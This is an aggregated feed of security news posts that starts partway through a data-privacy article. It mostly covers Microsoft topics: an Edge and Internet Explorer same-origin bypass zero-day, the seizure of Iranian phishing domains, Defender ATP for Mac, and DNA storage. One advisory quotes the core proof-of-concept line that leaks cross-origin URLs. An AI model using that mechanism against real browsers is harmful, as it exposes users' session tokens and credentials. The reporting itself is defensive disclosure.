Moving to China, a whole new risk factor comes into play—surveillance.

China’s cybersecurity law grants the Chinese government broad, invasive powers to spy on Internet-related businesses that operate within the country. Implemented in 2017, the law allows China’s foreign intelligence agency to perform “national security reviews” on technology that foreign companies want to sell or offer in China.

This authority raised alarm bells for the researchers at Recorded Future, who attributed past cyberattacks directly to the Chinese government. Researchers said the law could give the Chinese government the power to both find and exploit zero-day vulnerabilities in foreign companies’ products, all for the price of admission into the Chinese market.

“China’s law has a hidden angle for government control and monitoring,” Zhang said. “It has a different rationale.”

Outside of China, Singapore has garnered the attention of Google, Microsoft, and Amazon, which all built data centers in the country in the past few years. The country passed its Personal Data Protection Act in 2012 and its Cybersecurity Act in 2018, the latter of which sets up a framework for monitoring cybersecurity threats in the country.

The law has a narrow scope, as it only applies to companies and organizations that control what the Singaporean government calls “critical information infrastructure,” or CII. This includes computer systems that manage banking, government, healthcare, and aviation services, among others. The law also includes data breach notification requirements.

Moving to South Korea, the risk for organizations goes up dramatically, Zhang said. The country’s Personal Information Protection Act preserves the privacy rights of its citizens, and its penalties include criminal and regulatory fines, and even jail time. Cross-border data transfers, in particular, are strictly guarded. One wrongful transfer can result in a fine of up to three percent of a company’s revenue.

Africa

Traveling once again, expansion into Africa requires an understanding of the continent’s burgeoning, or sometimes non-existent, data privacy laws. Zhang said that, of Africa’s more than 50 countries, only about 15 have data protection laws, and even fewer have the regulators necessary to enforce those laws.

“Among [the countries], nine have no regulators to enforce the law, and five have a symbolic law but it’s not enforced,” Zhang said.

So, that invites the question: What exactly does happen if a company expands into a country that doesn’t have any data privacy laws?

What happens is potentially more risk.

First, a country could actually develop and pass a data privacy law within years of a company’s expansion into its borders. It’s not unheard of—less than one year after Amazon announced its rollout into Bahrain, the country introduced its first comprehensive data privacy law. Second, compliance with the new data privacy law could be expensive, Zhang said, forcing a company into a tough situation where it might have to withdraw entirely from the new market.

“One common misconception is that if a country doesn’t have a law at all, it’s a good country to go to,” Zhang said. “You should think twice about whether that’s the case.

Expand or not? It’s up to each company

There is no single roadmap for companies entering new markets outside the United States. Instead, there are multiple paths a company can take depending on its product, services, the data it collects, data it will need to move between borders, and its tolerance for risk.

The safest path, Zhang said, is to ask questions upfront. It is far better to make an informed decision about how to enter a market—even if compliance is costly—than to be surprised with fines or penalties later on.

The post The global data privacy roadmap: a question of risk appeared first on Malwarebytes Labs.

TrendLabs Security Intelligence Blog: Microsoft Edge and Internet Explorer Zero-Days Allow Access to Confidential Session Data

by Kassiane Westell

On March 30th, security researcher James Lee disclosed information on two zero-day vulnerabilities present in current versions of Microsoft Edge and Internet Explorer. These vulnerabilities make it possible for confidential information to be shared between websites.

A flaw in the same-origin policy for these web browsers, called an Origin Validation Error (CWE-346), allows JavaScript embedded in a malicious web page to gather information about other web pages the user has visited. If a user visits a malicious page via a Microsoft Edge or Internet Explorer web browser, these vulnerabilities may be used to relay sensitive information about the client’s browser session back to an attacker. Lee has shared a simple proof-of-concept (POC) for each vulnerability.

How same-origin policies work

To illustrate the same-origin policy, visualize a scenario where an attacker wishes to gain access to a client’s banking information. The attacker tricks the user into visiting the site “hxxp://www.attack1.com,” which has JavaScript embedded in a malicious webpage that can supposedly access all the session IDs currently stored in the client’s cache. In particular, this maneuver attempts to expose an online banking session a user is running with “hxxp://www.trustedbank.com”.

A same-origin policy within the client’s browser should prevent the script on “attack1.com” from accessing information from “trustedbank.com” because the bank and the attacker’s webpage have different origins. Thus, the client’s banking information is not exposed to the attacker, and the client remains safe.

Analysis of the attack

Unfortunately, in the case of these vulnerabilities, an attacker can bypass the same-origin policy in Microsoft Edge and Internet Explorer.

Accessing a crafted website with the malicious script provided via a vulnerable browser (Internet Explorer in this case) yields the following result:

Figure.1

Figure 1. Pop-up caused by POC being accessed by client through Internet Explorer.

In this case, a proof-of-concept webpage hosted on “pwning.click” redirects to the search engine “bing.com.” If the same-origin policy in Internet Explorer — the browser being used by the client — was working properly, then the embedded JavaScript would only display information from pwning.click. Shockingly, the pop-up displays information from the search results of bing.com.

The browser is not restricting information about the website redirection properly, and instead allows pwning.click to access information about the client’s activities on other websites. In a malicious attack scenario, the attacker could also receive the information directly. There would be no pop-up and the user would be unaware of any compromise.

The images below show the traffic captures of the POC being accessed by Internet Explorer and Microsoft Edge:

Figure.2

Figure 2. Traffic capture of POC accessed using Internet Explorer, which James Lee made public.

Figure.3

Figure 3. Traffic capture of POC accessed using Microsoft Edge, which James Lee made public.

The line “performance.getEntries(“resource”)[index].name” is the important part of this POC. This line in the embedded JavaScript is accessing the name of the resolved URL of the requested resource through Javascript’s Performance API.

Performance.getEntries(<entryType>) will return a list of PerformanceEntry objects with the attributes seen below in Figure 4. An updated list of valid entryTypes can be found here.

Figure.4

 

Figure 4. List of PerformanceEntry object fields found here

Note that performance.getEntriesByType(“resource”)[index].name is simply performance.getEntries for Internet Explorer, thus the technical explanation is essentially the same.

The URL in the popup in Figure 1 is not equivalent to the embedded origin, which shows that the attacker has successfully bypassed the same-origin policy in the browser and accessed a resource that should have been restricted.

The attacker now has access to any information stored in the URL, even if it is supposed to be hidden. Examples of vulnerable information that might be stored in the URL include cookies, sessionIDs, usernames, passwords, and OAUTH tokens, either in plaintext or hash form. OAUTH is a way of authorizing third party applications to login to users’ online accounts, and has a history of being abused. Any sensitive information included in the URL of a website could be collected using these vulnerabilities.

Putting these vulnerabilities in perspective, recall the failed attack scenario. If the attacker could bypass this same-origin policy and gain access to confidential information exchanged between user and “trustedbank.com,” the user’s online banking account could be compromised. The attacker would be able to impersonate the client and gain access to the client’s personal information for online authentication, which could have devastating effects.

How to safely browse the web

This vulnerability is potentially very serious, since it can expose aspects of confidential browsing sessions to malicious servers. There is currently no information on when Microsoft will provide a fix for this threat, making this a high-risk scenario for end users. One solution would be to stop using Microsoft Edge and Internet Explorer until the bug is fixed.

The Trend Micro™ Deep Security™ platform and Vulnerability Protection can protect user systems from any threats that may target the vulnerability detailed above via the following DPI rules:

  • 1009640 – Microsoft Edge And Internet Explorer Same Origin Policy Bypass Vulnerabilities

The post Microsoft Edge and Internet Explorer Zero-Days Allow Access to Confidential Session Data appeared first on .



TrendLabs Security Intelligence Blog

Microsoft adds tamper protection to Microsoft Defender ATP

Microsoft has added a new tamper protection feature to Microsoft Defender ATP (formerly Windows Defender ATP) antimalware solution. When turned on, it should prevent malicious apps and actors from disabling the antimalware solution or some of its key security features. Foiling often-used tactics Malware developers are forever looking for ways to make its wares “invisible” to users, AV/antimalware software and malware analysts. They pursue the first goal by disguising the malware as a legitime document … More

The post Microsoft adds tamper protection to Microsoft Defender ATP appeared first on Help Net Security.

Tripwire Patch Priority Index for March 2019

Tripwire’s March 2019 Patch Priority Index (PPI) brings together the top vulnerabilities for March 2019. First on the patch priority list this month are patches for Microsoft’s Browser, Scripting Engine and VBScript. These patches resolve 23 vulnerabilities, including fixes for Memory Corruption, Elevation of Privilege, Security Feature Bypass and Remote Code Execution vulnerabilities. Next on […]… Read More

The post Tripwire Patch Priority Index for March 2019 appeared first on The State of Security.

The State of Security: Tripwire Patch Priority Index for March 2019

Tripwire’s March 2019 Patch Priority Index (PPI) brings together the top vulnerabilities for March 2019. First on the patch priority list this month are patches for Microsoft’s Browser, Scripting Engine and VBScript. These patches resolve 23 vulnerabilities, including fixes for Memory Corruption, Elevation of Privilege, Security Feature Bypass and Remote Code Execution vulnerabilities. Next on […]… Read More

The post Tripwire Patch Priority Index for March 2019 appeared first on The State of Security.



The State of Security

Microsoft’s Collaboration On Google’s Chromium Brings a New Feature To Chrome

Remember when Microsoft announced they'd be switching to Google's open source Chromium browser for developing their own Edge browser? At the time Google announced "We look forward to working with Microsoft and the web standards community to advance the open web, support user choice, and deliver great browsing experiences." Now MSPoweruser reports Microsoft has indeed started collaborating on Chromium -- making suggestions like caret browsing and a native high-contrast mode -- and at least one of Microsoft's suggestions is already coming to Chrome. it looks like there is one feature that Chromium approved which will be making its way to Chrome soon. According to a new bug (via Techdows) filing on Chromium, Google is working on bringing text suggestions for hardware keyboard to Chrome soon. The feature will allow users to get suggestions as they type which is currently available on Windows 10 and on Microsoft Edge. Google has just started working on the feature and has set the priority to 2 which suggests that the feature should be available sooner than later.

Read more of this story at Slashdot.

Security Affairs: Expert disclosed two Zero-Day flaws in Microsoft browsers

The 20-year-old security researcher James Lee publicly disclosed details and proof-of-concept exploits for two zero-day vulnerabilities in Microsoft web browsers.

The expert opted to disclose the flaw after the tech giant allegedly failed to address the zero-day issues privately he reported.
The researcher reported the issues to Microsoft ten months ago, but the company did not respond to the responsible disclosure.

One of the flaws affects the latest version of the Edge Browser, both flaws could be exploited by a remote attacker to bypass same-origin policy on the victim’s web browser.

Same Origin Policy (SOP) is a security mechanism that is implemented in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin. A SOP bypass occurs when a sitea.com is somehow able to access the properties of siteb.com such as cookies, location, response etc.

Microsoft browser zero-day

The zero-day flaw discovered by James Lee, who shared technical details with The Hacker News, could be exploited by attackers to set up a malicious website to perform universal cross-site scripting (UXSS) attacks against any domain visited using the vulnerable Microsoft web browsers.

The attacker just needs to trick victims into visiting a malicious website created to steal victim’s sensitive data (i.e. login session, cookies), from other sites visited on the same browser.

“The issue is within Resource Timing Entries in Microsoft Browsers which inappropriately leak Cross-Origin URLs after redirection,” Lee told The Hacker News in an email.

Lee also released proof-of-concept (PoCs) exploits for both vulnerabilities.

My friends at the Hacker News have tested and confirmed both the zero-day flaw against the latest version of Internet Explorer and Edge running on a fully-patched Windows 10 operating system.

The availability of the PoC exploit code could allows threat actors to exploit both zero-day vulnerabilities to target Microsoft users.

Waiting for a fix, users could use other web browsers such as Chrome or Firefox.

Pierluigi Paganini

(SecurityAffairs – Microsoft browsers, zero-day)

The post Expert disclosed two Zero-Day flaws in Microsoft browsers appeared first on Security Affairs.



Security Affairs

Expert disclosed two Zero-Day flaws in Microsoft browsers

The 20-year-old security researcher James Lee publicly disclosed details and proof-of-concept exploits for two zero-day vulnerabilities in Microsoft web browsers.

The expert opted to disclose the flaw after the tech giant allegedly failed to address the zero-day issues privately he reported.
The researcher reported the issues to Microsoft ten months ago, but the company did not respond to the responsible disclosure.

One of the flaws affects the latest version of the Edge Browser, both flaws could be exploited by a remote attacker to bypass same-origin policy on the victim’s web browser.

Same Origin Policy (SOP) is a security mechanism that is implemented in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin. A SOP bypass occurs when a sitea.com is somehow able to access the properties of siteb.com such as cookies, location, response etc.

Microsoft browser zero-day

The zero-day flaw discovered by James Lee, who shared technical details with The Hacker News, could be exploited by attackers to set up a malicious website to perform universal cross-site scripting (UXSS) attacks against any domain visited using the vulnerable Microsoft web browsers.

The attacker just needs to trick victims into visiting a malicious website created to steal victim’s sensitive data (i.e. login session, cookies), from other sites visited on the same browser.

“The issue is within Resource Timing Entries in Microsoft Browsers which inappropriately leak Cross-Origin URLs after redirection,” Lee told The Hacker News in an email.

Lee also released proof-of-concept (PoCs) exploits for both vulnerabilities.

My friends at the Hacker News have tested and confirmed both the zero-day flaw against the latest version of Internet Explorer and Edge running on a fully-patched Windows 10 operating system.

The availability of the PoC exploit code could allows threat actors to exploit both zero-day vulnerabilities to target Microsoft users.

Waiting for a fix, users could use other web browsers such as Chrome or Firefox.

Pierluigi Paganini

(SecurityAffairs – Microsoft browsers, zero-day)

The post Expert disclosed two Zero-Day flaws in Microsoft browsers appeared first on Security Affairs.

Unpatched Zero-Days in Microsoft Edge and IE Browsers Disclosed Publicly

Exclusive — A security researcher today publicly disclosed details and proof-of-concept exploits for two 'unpatched' zero-day vulnerabilities in Microsoft's web browsers after the company allegedly failed to respond to his responsible private disclosure. Both unpatched vulnerabilities—one of which affects the latest version of Microsoft Internet Explorer and another affects the latest Edge

E Hacking News – Latest Hacker News and IT Security News: 99 Iranian websites used for hacking were seized by Microsoft

                    




According to a report by Associated Press, Microsoft has seized 99 Iranian websites that were supposedly stealing information and launching cyber attacks. The report also said that it had been tracking the group of hackers since 2013.

The hackers were targeting people in the middle east to steal sensitive information by using the malicious websites that were disguised as Microsoft, Linkedin, Outlook and Windows products. Microsoft confirmed in a court filing that this group was stealing information about reporters, activists, political people including “ protesting oppressive regimes”.

The hackers are from Iran but the Tehran government has denied any hacking activity from their end. In the past also Iran government has denied any hacking attempts from their end.

Allison Wikoff, a security researcher at Atlanta-based SecureWorks told Associated Press that according to her observation it is one of the “more active Iranian threat groups”. She further added that Microsoft analyze fake domains through analyzing traffics to protect against fake domains and the practice is popularly called as “sinkholing”.In the past also, Microsoft has used “sinkholing” to seize fake domains made by Russian hackers back in 2016.









E Hacking News - Latest Hacker News and IT Security News

99 Iranian websites used for hacking were seized by Microsoft

                    




According to a report by Associated Press, Microsoft has seized 99 Iranian websites that were supposedly stealing information and launching cyber attacks. The report also said that it had been tracking the group of hackers since 2013.

The hackers were targeting people in the middle east to steal sensitive information by using the malicious websites that were disguised as Microsoft, Linkedin, Outlook and Windows products. Microsoft confirmed in a court filing that this group was stealing information about reporters, activists, political people including “ protesting oppressive regimes”.

The hackers are from Iran but the Tehran government has denied any hacking activity from their end. In the past also Iran government has denied any hacking attempts from their end.

Allison Wikoff, a security researcher at Atlanta-based SecureWorks told Associated Press that according to her observation it is one of the “more active Iranian threat groups”. She further added that Microsoft analyze fake domains through analyzing traffics to protect against fake domains and the practice is popularly called as “sinkholing”.In the past also, Microsoft has used “sinkholing” to seize fake domains made by Russian hackers back in 2016.







E Hacking News – Latest Hacker News and IT Security News: US Court Authorizes Microsoft to be in Charge of 99 Hacking Sites


Microsoft has been legally given the control of 99 websites which were being operated in association with an Iranian hacking group, Phosphorus. 

In order to prevent the sites from being employed for the execution of cyber attacks, a US court authorized Microsoft's Digital Crimes Unit to be in charge of these websites related to the aforementioned hacking group which is also known as Charming Kitten, Ajax Security Team and APT 35.

The malicious group, Phosphorus is configured to employ spear-phishing to sneak into private accounts of individuals. Cybercriminals at Phosphorus resort to social engineering in order to lure individuals to click on the links, at times sent via fake accounts that appear to be of familiar contacts. The link carries infectious software which allows Phosphorus to sneak into the computer systems.

Basically, it performs malicious activity to acquire access to sensitive data stored onto the computer systems of government agencies and businesses.

Putting the same into context in a blog post, Tom Burt, Corporate Vice President, Customer Security and Trust at Microsoft, said, "Its targets also include activists and journalists - especially those involved in advocacy and reporting on issues related to the Middle East,"

"Microsoft's Digital Crimes Unit (DCU) and the Microsoft Threat Intelligence Center (MSTIC) have been tracking Phosphorus since 2013,"

"Phosphorus also uses a technique, whereby it sends people an email that makes it seem as if there's a security risk to their accounts, prompting them to enter their credentials into a web form that enables the group to capture their passwords and gain access to their systems," Burt told in his blog post.


Commenting on the matter, Microsoft said, "The action we executed last week enabled us to take control of 99 websites and redirect traffic from infected devices to our Digital Crime Unit's sinkhole."


E Hacking News - Latest Hacker News and IT Security News

US Court Authorizes Microsoft to be in Charge of 99 Hacking Sites


Microsoft has been legally given the control of 99 websites which were being operated in association with an Iranian hacking group, Phosphorus. 

In order to prevent the sites from being employed for the execution of cyber attacks, a US court authorized Microsoft's Digital Crimes Unit to be in charge of these websites related to the aforementioned hacking group which is also known as Charming Kitten, Ajax Security Team and APT 35.

The malicious group, Phosphorus is configured to employ spear-phishing to sneak into private accounts of individuals. Cybercriminals at Phosphorus resort to social engineering in order to lure individuals to click on the links, at times sent via fake accounts that appear to be of familiar contacts. The link carries infectious software which allows Phosphorus to sneak into the computer systems.

Basically, it performs malicious activity to acquire access to sensitive data stored onto the computer systems of government agencies and businesses.

Putting the same into context in a blog post, Tom Burt, Corporate Vice President, Customer Security and Trust at Microsoft, said, "Its targets also include activists and journalists - especially those involved in advocacy and reporting on issues related to the Middle East,"

"Microsoft's Digital Crimes Unit (DCU) and the Microsoft Threat Intelligence Center (MSTIC) have been tracking Phosphorus since 2013,"

"Phosphorus also uses a technique, whereby it sends people an email that makes it seem as if there's a security risk to their accounts, prompting them to enter their credentials into a web form that enables the group to capture their passwords and gain access to their systems," Burt told in his blog post.


Commenting on the matter, Microsoft said, "The action we executed last week enabled us to take control of 99 websites and redirect traffic from infected devices to our Digital Crime Unit's sinkhole."

As Windows 10 19H1 Update Approaches, Microsoft Says Version 1809 is Now Ready For ‘Broad Deployment’

We're now very close to the next semi-annual update for Windows 10, but Microsoft has just announced today that the version 1809 released last Fall is now the recommended version for all users. From a report: This is a new milestone in the troubled history of this major release, as Microsoft had to pause its public rollout after discovering a serious file deletion bug in October. "Based on the data and the feedback we've received from consumers, OEMs, ISVs, partners, and commercial customers, Windows 10, version 1809 has transitioned to broad deployment," wrote John Wilcox, Windows as a service evangelist on the Windows IT Pro blog today. We're now a little more than four months removed from Microsoft's re-released Windows 10 version 1803, and Microsoft previously admitted that it would be more cautious during the public rollout. According to AdDuplex's latest survey on more than 100,000 Windows 10 PCS, only 26.4% of them were running the version 1809 in March.

Read more of this story at Slashdot.

Microsoft seizes 99 websites used by Iranian hackers for phishing attacks

By Uzair Amir

Microsoft has announced that it has seized some key websites that Iranian hackers used for stealing sensitive information from unsuspecting users in the US as well as launching cyber attacks. Reportedly, 99 websites have been seized by Microsoft of an Iranian hacker group that is known by many names including Phosphorus, Charming Kitten and APT […]

This is a post from HackRead.com Read the original post: Microsoft seizes 99 websites used by Iranian hackers for phishing attacks

Microsoft Memo Bans April Fools’ Day Pranks

Everyone hates April Fools' Day, and Microsoft is taking a stand against its own corporate pranks. From a report: Microsoft's marketing chief Chris Capossela has warned all employees to not participate in the process of annoying hoaxes on Monday. In an internal memo, Capossela explains that "data tells us these stunts have limited positive impact and can actually result in unwanted news cycles." He encourages all teams inside Microsoft not to do any public-facing April Fools' Day stunts. "I appreciate that people may have devoted time and resources to these activities, but I believe we have more to lose than gain by attempting to be funny on this one day," says Capossela. That's probably a safe bet, as we've seen some April Fools' Day pranks backfire spectacularly in the past. Google was forced to apologize for adding Despicable Me minions into emails and muting threads a few years ago, causing email havoc for Gmail users. Microsoft has also participated in many April Fools' Day pranks over the years, including an MS-DOS mobile for Windows Phone and Google insults.

Read more of this story at Slashdot.

Microsoft announces Windows Defender ATP for Mac

Microsoft’s Windows Defender ATP coming soon to Mac

Microsoft has announced the Windows Defender Advanced Threat Protection (ATP) enterprise platform for macOS. However, Windows Defender ATP is now called Microsoft Defender Advanced Threat Protection (ATP) for Mac, which offers full antivirus and threat protection along with the ability to launch full, quick, and custom scans.

“Today, we’re announcing our advances in cross-platform next-generation protection and endpoint detection and response coverage with a new Microsoft solution for Mac. Core components of our unified endpoint security platform, including the new Threat & Vulnerability Management also announced today, will now be available for Mac devices,” Microsoft said in a blog post.

“We’ve been working closely with industry partners to enable Windows Defender Advanced Threat Protection (ATP) customers to protect their non-Windows devices while keeping a centralized “single pane of glass” experience. Now we are going a step further by adding our own solution to the options, starting with a limited preview today.”

According to Microsoft, “the user interface brings a similar experience to what customers have today on Windows 10 devices.” The antivirus software is compatible with devices running macOS Mojave, macOS High Sierra, and macOS Sierra.

During the limited preview period, Microsoft Defender ATP for Mac will allow end users to review and perform configuration of their protection, including:

  • Running scans, including full, quick, and custom path scans (we recommend quick scans in nearly all scenarios)
    • Reviewing detected threats
    • Taking actions on threats, including quarantine, remove, or allow
    • Disabling or enabling real-time protection, cloud-delivered protection, and automatic sample submission
    • Adding exclusions for files and paths
    • Managing notifications when threats are found
    • Manually checking for security intelligence updates

Further, Microsoft has also installed the AutoUpdate software to ensure that the app remains up to date on macOS and is properly connected to the Cloud.

Currently, the Defender ATP for Mac is only available as a limited preview for Microsoft’s business customers so that they can test the antivirus protection in setups that include both Windows and Mac machines.

Mac customers can apply for Microsoft Defender ATP preview here.

Source: Microsoft

The post Microsoft announces Windows Defender ATP for Mac appeared first on TechWorm.

Microsoft demonstrates first fully automated DNA data storage with a ‘hello’

Microsoft successfully automates DNA-based data storage system

Researchers from Microsoft and the University of Washington having been working since 2016 on developing one of the first complete DNA-based data storage system that can actually shrink the space needed to store digital data. The storage system will have random-access readability and error correction protocols that would be required for real-world applications.

Microsoft on Thursday finally announced that a team of researchers has successfully executed the first fully automated system where data can be stored and retrieved in manufactured DNA and then again converted back into digital data.

The researchers published their proof-of-concept system in a new paper in Nature Scientific Reports journal on March 21.

In a simple proof-of-concept test, the research team was able to successfully encode the word “hello” in snippets of fabricated DNA and convert it back to digital data using a fully automated end-to-end system. It took the researchers 21 hours to convert five bytes of data.

“We have conviction that DNA molecules are good candidates for data storage. But we are, at heart, computer architects. We really want to figure out what a future computer could look like,” Luis Ceze, a professor at UW’s Paul G. Allen School of Computer Science and Engineering said. “What’s exciting for us here is that it’s one step toward showing a computer system that has a molecular component and an electronic component.”

The method for DNA data storage is similar to the way the DNA in our cells encodes genetic information. The encoding system uses software that converts zeroes and ones that make up a digital file using the four basic building blocks of DNA – adenine, guanine, cytosine and thymine. The “letters” of DNA code — adenine, thymine, cytosine, and guanine, or A-T-C-G — stood in for the 1’s and 0’s of a computer’s binary code that can be read by digital machines.

For instance, “Hello” could be coded into the chemical string TCAACATGATGAGTA. To do so, the device first encoded the bits (1’s and 0’s) into DNA sequences (A’s, C’s, T’s, G’s), synthesized the DNA, and then stored it as a liquid. The stored DNA was then read by a DNA sequencer and finally, the sequences were translated back into bits by the decoding software.

“Our ultimate goal is to put a system into production that, to the end user, looks very much like any other cloud storage service — bits are sent to a datacenter and stored there and then they just appear when the customer wants them,” said principal researcher Karin Strauss, a UW affiliate associate professor in the Paul G. Allen School of Computer Science and Engineering and a senior researcher at Microsoft. “To do that, we needed to prove that this is practical from an automation perspective.”

Until now, the system has managed to store one gigabyte of data in DNA, besting their previous world record of 200 MB. The stored data includes cat photographs, great literary works, pop videos as well as archival recordings in DNA, which were retrieved without errors, the researchers said.

However, the drawback is that it’s expensive and extremely slow to write data to DNA, because of the slow chemical reactions involved in writing DNA and then getting it back from DNA which involves sequencing and decoding files back to 0s and 1s.

“Information is stored in synthetic DNA molecules created in a lab, not DNA from humans or other living things, and can be encrypted before it is sent to the system. While sophisticated machines such as synthesizers and sequencers already perform key parts of the process, many of the intermediate steps until now have required manual labor in the research lab. But that wouldn’t be viable in a commercial setting, said Chris Takahashi, senior research scientist at the UW’s Paul G. Allen School of Computer Science & Engineering.

“You can’t have a bunch of people running around a datacenter with pipettes — it’s too prone to human error, it’s too costly and the footprint would be too large,” Takahashi added.

Microsoft believes that synthetic DNA could be the next big step forward in long-term data storage with ease. “We are definitely seeing a new kind of computer system being born here where you are using molecules to store data and electronics for control and processing. Putting them together holds some really interesting possibilities for the future,” said Ceze.

Source: Microsoft

The post Microsoft demonstrates first fully automated DNA data storage with a ‘hello’ appeared first on TechWorm.

TypeScript’s Quiet, Steady Rise Among Programming Languages

Microsoft's programming language TypeScript has become one of the most popular languages among developers, at least according to a report published by the analyst firm RedMonk this week. Wired: TypeScript jumped from number 16 to number 12, just behind Apple's programming language Swift in RedMonk's semiannual rankings, which were last published in August. Microsoft unveiled TypeScript in 2012, and while it hasn't grown as quickly as Swift -- which has grown faster than any other language, ever since RedMonk started compiling the rankings in 2011 -- TypeScript's own ascendance is impressive, given the sheer number of available programming languages. More and more applications these days use TypeScript. Google's programming framework Angular, the second most popular tool of its type according to data released last year by the startup NPM, is written in TypeScript. So is Vue, an increasingly popular framework finding a home both among smaller companies and tech giants like Alibaba. But RedMonk doesn't look at how many jobs are available for people skilled in a particular language, nor how many companies actually use the language. Instead, the firm tries to spot trends in developer interest by looking at how many projects on GitHub use certain languages, and how many questions are asked about those languages on the programmer Q&A site Stack Overflow. The idea is to get a sense of where the software development profession is heading.

Read more of this story at Slashdot.

Microsoft Says the FCC ‘Overstates’ Broadband Availability In the US

An anonymous reader quotes a report from Motherboard: Microsoft this week was the latest to highlight the U.S. government's terrible broadband mapping in a filing with the FCC, first spotted by journalist Wendy Davis. In it, Microsoft accuses the FCC of over-stating actual broadband availability and urges the agency to do better. "The Commission's broadband availability data, which underpins FCC Form 477 and the Commission's annual Section 706 report, appears to overstate the extent to which broadband is actually available throughout the nation," Microsoft said in the filing. "For example, in some areas the Commission's broadband availability data suggests that ISPs have reported significant broadband availability (25 Mbps down/3 Mbps up) while Microsoft's usage data indicates that only a small percentage of consumers actually access the Internet at broadband speeds in those areas," Microsoft said. Similar criticism has long plagued the agency. The FCC's broadband data is received via the form 477 data collected from ISPs. But ISPs have a vested interest in over-stating broadband availability to obscure the sector's competition problems, and the FCC historically hasn't worked very hard to independently verify whether this data is truly accurate. The FCC's methodology has long been criticized as well. As it currently stands, the agency declares an entire ZIP code as "served" with broadband if just one home in an entire census block has it. In its filing, Microsoft "suggested that the Commission's ongoing effort to more accurately measure broadband could be improved by drawing on the FCC's subscription data, along with other broadband data sets from third-parties such as Microsoft, to complement survey data submitted under the current rules."

Read more of this story at Slashdot.

Bromium: Application Isolation in the Spotlight

  • Two major announcements bring application isolation into the spotlight
  • Microsoft and HP elevate the importance of isolation in the endpoint security stack
  • Isolate risky browser activity, but don’t forget files are risky too

This week, two major announcements came out highlighting the need for application isolation in the security stack for endpoint security – HP DaaS Proactive Security and Microsoft Windows Defender extensions for Chrome and Firefox. The spotlight on application isolation is an excellent way to raise awareness for this technology, and I applaud HP and Microsoft for going all out with isolation as a way to boost endpoint security. Here is a closer look at what both announcements are highlighting.

Microsoft Defender Application Guard (WDAG)

Microsoft Windows Defender Application Guard (WDAG) was announced over a year ago, it introduced client virtualization on Windows. The initial release was designed to redirect untrusted (or not explicitly trusted) Edge browser activity into a VM. The end-user would surf the web using Edge, and if they typed in a URL or were redirected to a site that was untrusted, the website would open in a separate instance of Edge that was running isolated inside a VM. The end-user would have two instances of Edge running and the protected instance was noted with a red background.

Everyone was excited when WDAG came out, as browsers continue to be a major attack vector, and we even wrote a blog supporting Microsoft entering the isolation market. As any security specialist will tell you, the safest way to stop malware is to keep end-users from opening emails or surfing the web altogether. However, while true, this is clearly not practical, but isolation is the technology that can change the game.  Unfortunately for Microsoft, it was not practical to expect users to abandon Chrome and Firefox for Edge. You win some and you lose some, and Microsoft did not win the browser market. BUT they also didn’t lose sight of the importance of isolating potentially risky browser activity, which brings us to their announcement this week.

Microsoft releases Windows Defender Application Guard for Chrome and Firefox

Microsoft WDAG now allows users to surf the web using their browser of choice. When a user types in or is redirected to an untrusted site, the Chrome or Firefox extension directs opening of the website to Edge, which is running inside a VM. WDAG is still about client virtualization aiming to isolate risky websites into a separate VM on the user’s PC, but now the user is not required to use Microsoft Edge as their default browser. The end-user will have most of their browser activity take place in their default browser. However, when the user encounters an untrusted site, they will access that website in an isolated instance of Edge. Welcome back to browser isolation, Microsoft, and thank for you validating the application isolation market!

The second announcement this week that validates application isolation was from HP.

HP DaaS Proactive Security

HP and Bromium have enjoyed a productive relationship for over two years, since HP launched HP Sure Click, which uses Bromium Secure isolation technology for hardware-enforce browser isolation. Our relationship continues to grow and evolve, and this week HP announced the next step –including Bromium Secure isolation for browsing and files in their HP DaaS Proactive Security powered by HP Sure Click Advance. This announcement further validates that major players in the hardware and software market are recognizing the need to move the responsibility for endpoint security away from the end-user. Microsoft and HP are choosing to rely on application isolation as the way to prevent malware from invading Windows endpoints and spreading onto corporate networks.

Isolate Only Browsers?

While we applaud Microsoft’s decision to use isolation for surfing the web and for links that come in emails, there’s an obvious gap in their coverage. What about emails with attachments? And how about files that users download from the Internet? Browsers are indeed a major attack vector, but files are equally a major attack vector.  If you don’t think files are a threat, you might want to visit some of our latest Threat Intelligence posts below.

What do you think of this week’s announcements? Share your thoughts and questions in the comments section. Happy reading!

See Bromium threat intelligence in action:

The post Application Isolation in the Spotlight appeared first on Bromium.



Bromium

Microsoft Ships Antivirus For macOS as Windows Defender Becomes Microsoft Defender

Microsoft is bringing its Windows Defender anti-malware application to macOS -- and more platforms in the future -- as it expands the reach of its Defender Advanced Threat Protection (ATP) platform. From a report: To reflect the new cross-platform nature, the suite is also being renamed to Microsoft Defender ATP, with the individual clients being labelled "for Mac" or "for Windows." macOS malware is still something of a rarity, but it's not completely unheard of. Ransomware for the platform was found in 2016, and in-the-wild outbreaks of other malicious software continue to be found. Apple has integrated some malware protection into macOS, but we've heard from developers on the platform that Mac users aren't always very good at keeping their systems on the latest point release. Further reading: Microsoft launches previews of Windows Virtual Desktop and Defender ATP for Mac.

Read more of this story at Slashdot.

Microsoft Launch Application Guard Extension For FireFox and Chrome

Earlier, Microsoft introduced a dedicated Windows Defender browser extension for its browser Microsoft Edge with Windows 10. The extension, named

Microsoft Launch Application Guard Extension For FireFox and Chrome on Latest Hacking News.

Report: with most exploited vuln of 2018, it’s really Really REALLY time to ditch IE!

Microsoft's products are still a leading source of exploitable security vulnerabilities used by hackers, according to a report by the firm Recorded Future.

The post Report: with most exploited vuln of 2018, it’s really Really REALLY time to ditch IE! appeared first on The Security Ledger.

Related Stories

McAfee releases MVISION Cloud security solution for Microsoft Teams

McAfee, the device-to-cloud cybersecurity company, announced McAfee MVISION Cloud for Microsoft Teams, a comprehensive security and compliance integration for Teams. McAfee MVISION Cloud for Microsoft Teams is an extension to the already available comprehensive security solution that McAfee MVISION Cloud has for Microsoft Office 365. This solution nicely complements Team’s capabilities by using a frictionless API-based cloud-native approach that allows IT teams to seamlessly enforce data loss prevention (DLP) policies and collaboration controls, contextual access … More

The post McAfee releases MVISION Cloud security solution for Microsoft Teams appeared first on Help Net Security.

Google, Microsoft Work Together For a Year To Figure Out New Type of Windows Flaw

